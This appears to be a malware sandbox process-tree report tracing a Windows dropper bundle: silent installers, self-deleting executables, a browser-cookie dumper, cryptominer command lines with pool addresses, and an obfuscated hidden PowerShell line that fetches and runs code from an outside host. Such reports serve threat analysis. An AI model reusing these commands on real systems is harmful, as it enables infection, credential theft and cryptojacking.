C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t4tgglxb.hdl\Four.exe & exit15⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\t4tgglxb.hdl\Four.exeC:\Users\Admin\AppData\Local\Temp\t4tgglxb.hdl\Four.exe16⤵PID:6520
-
C:\Users\Admin\AppData\Local\Temp\BS32ROBVTL\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BS32ROBVTL\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:6012
-
-
C:\Users\Admin\AppData\Local\Temp\VT9VOET826\setups.exe"C:\Users\Admin\AppData\Local\Temp\VT9VOET826\setups.exe" ll17⤵PID:6368
-
C:\Users\Admin\AppData\Local\Temp\is-JL5QR.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-JL5QR.tmp\setups.tmp" /SL5="$2056E,635399,250368,C:\Users\Admin\AppData\Local\Temp\VT9VOET826\setups.exe" ll18⤵PID:8176
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ab-20647-b2e-e7f9c-bfb8f95be7c23\Conohylaegae.exe"C:\Users\Admin\AppData\Local\Temp\ab-20647-b2e-e7f9c-bfb8f95be7c23\Conohylaegae.exe"14⤵PID:6232
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5736
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3pz1xgwxkwi\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\3pz1xgwxkwi\cpyrix.exe" /VERYSILENT8⤵PID:5212
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:3040
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:5184
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:6700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:2200
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5552
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:4876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c2amql5d2wa\mnxp0o2qnzs.exe"C:\Users\Admin\AppData\Local\Temp\c2amql5d2wa\mnxp0o2qnzs.exe" /ustwo INSTALL8⤵PID:5344
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "mnxp0o2qnzs.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\c2amql5d2wa\mnxp0o2qnzs.exe" & exit9⤵PID:4996
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "mnxp0o2qnzs.exe" /f10⤵
- Kills process with taskkill
PID:6392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rtrgpnyu4nt\app.exe"C:\Users\Admin\AppData\Local\Temp\rtrgpnyu4nt\app.exe" /8-238⤵PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\3lhqyfnt1lf\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\3lhqyfnt1lf\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\is-40T2H.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-40T2H.tmp\IBInstaller_97039.tmp" /SL5="$20356,14574851,721408,C:\Users\Admin\AppData\Local\Temp\3lhqyfnt1lf\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5748
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-3BRD8.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:6028
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-3BRD8.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5472
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ktlk5pmgk13\dmbhz1ccbf4.exe"C:\Users\Admin\AppData\Local\Temp\ktlk5pmgk13\dmbhz1ccbf4.exe" /quiet SILENT=1 AF=7568⤵PID:5636
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ktlk5pmgk13\dmbhz1ccbf4.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ktlk5pmgk13\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617184163 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:4332
-
-
-
C:\Users\Admin\AppData\Local\Temp\bsa1zclil2c\vpn.exe"C:\Users\Admin\AppData\Local\Temp\bsa1zclil2c\vpn.exe" /silent /subid=4828⤵PID:5660
-
C:\Users\Admin\AppData\Local\Temp\is-9IA0Q.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-9IA0Q.tmp\vpn.tmp" /SL5="$E037A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bsa1zclil2c\vpn.exe" /silent /subid=4829⤵PID:5824
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5172
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:2800
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7108
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:5416
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:5536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xifpii2nha2\vict.exe"C:\Users\Admin\AppData\Local\Temp\xifpii2nha2\vict.exe" /VERYSILENT /id=5358⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\hzbafpdmtui\3nqb0k0j11c.exe"C:\Users\Admin\AppData\Local\Temp\hzbafpdmtui\3nqb0k0j11c.exe"8⤵PID:5408
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\hzbafpdmtui\3nqb0k0j11c.exe"9⤵PID:5532
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1ja42awlgqd\a3loozweaiy.exe"C:\Users\Admin\AppData\Local\Temp\1ja42awlgqd\a3loozweaiy.exe" /VERYSILENT8⤵PID:5396
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\QMR9RO4Y51\setups.exe"C:\Users\Admin\AppData\Local\Temp\QMR9RO4Y51\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Users\Admin\AppData\Local\Temp\is-OH5FD.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-OH5FD.tmp\setups.tmp" /SL5="$A0062,635399,250368,C:\Users\Admin\AppData\Local\Temp\QMR9RO4Y51\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2672
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:4796
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4856
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:5004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\6226.tmp.exe"C:\Users\Admin\AppData\Roaming\6226.tmp.exe"5⤵PID:4920
-
C:\Users\Admin\AppData\Roaming\6226.tmp.exe"C:\Users\Admin\AppData\Roaming\6226.tmp.exe"6⤵PID:5024
-
-
-
C:\Users\Admin\AppData\Roaming\6469.tmp.exe"C:\Users\Admin\AppData\Roaming\6469.tmp.exe"5⤵PID:2168
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5360
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:6104
-
-
-
C:\Users\Admin\AppData\Roaming\6573.tmp.exe"C:\Users\Admin\AppData\Roaming\6573.tmp.exe"5⤵PID:4668
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\6573.tmp.exe6⤵PID:6612
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4528
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:6092
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5460
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4424
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6196
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:8168
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1752
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1548
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4424
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\is-QH3PT.tmp\a3loozweaiy.tmp"C:\Users\Admin\AppData\Local\Temp\is-QH3PT.tmp\a3loozweaiy.tmp" /SL5="$80308,2592217,780800,C:\Users\Admin\AppData\Local\Temp\1ja42awlgqd\a3loozweaiy.exe" /VERYSILENT1⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\is-K13AP.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-K13AP.tmp\winlthsth.exe"2⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\FUWSr44D4.exe"C:\Users\Admin\AppData\Local\Temp\FUWSr44D4.exe"3⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\FUWSr44D4.exe"C:\Users\Admin\AppData\Local\Temp\FUWSr44D4.exe"4⤵PID:4788
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:7184
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:7876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-6Q4UO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-6Q4UO.tmp\vict.tmp" /SL5="$90314,870426,780800,C:\Users\Admin\AppData\Local\Temp\xifpii2nha2\vict.exe" /VERYSILENT /id=5351⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\is-FQJ8O.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-FQJ8O.tmp\win1host.exe" 5352⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\KCMtbJ7Ix.exe"C:\Users\Admin\AppData\Local\Temp\KCMtbJ7Ix.exe"3⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\KCMtbJ7Ix.exe"C:\Users\Admin\AppData\Local\Temp\KCMtbJ7Ix.exe"4⤵PID:7056
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 5683⤵
- Program crash
PID:7308
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3680
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C2D687D74CB2BFB34544C2DDE0B5EA90 C2⤵PID:4820
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EE6C0B362477046596289DBE1A42F0DB2⤵PID:1012
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4232
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6452
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7868
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2684c0ef-c2f8-4047-bf20-232d5368424a}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6584
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵PID:5128
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6368
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:5020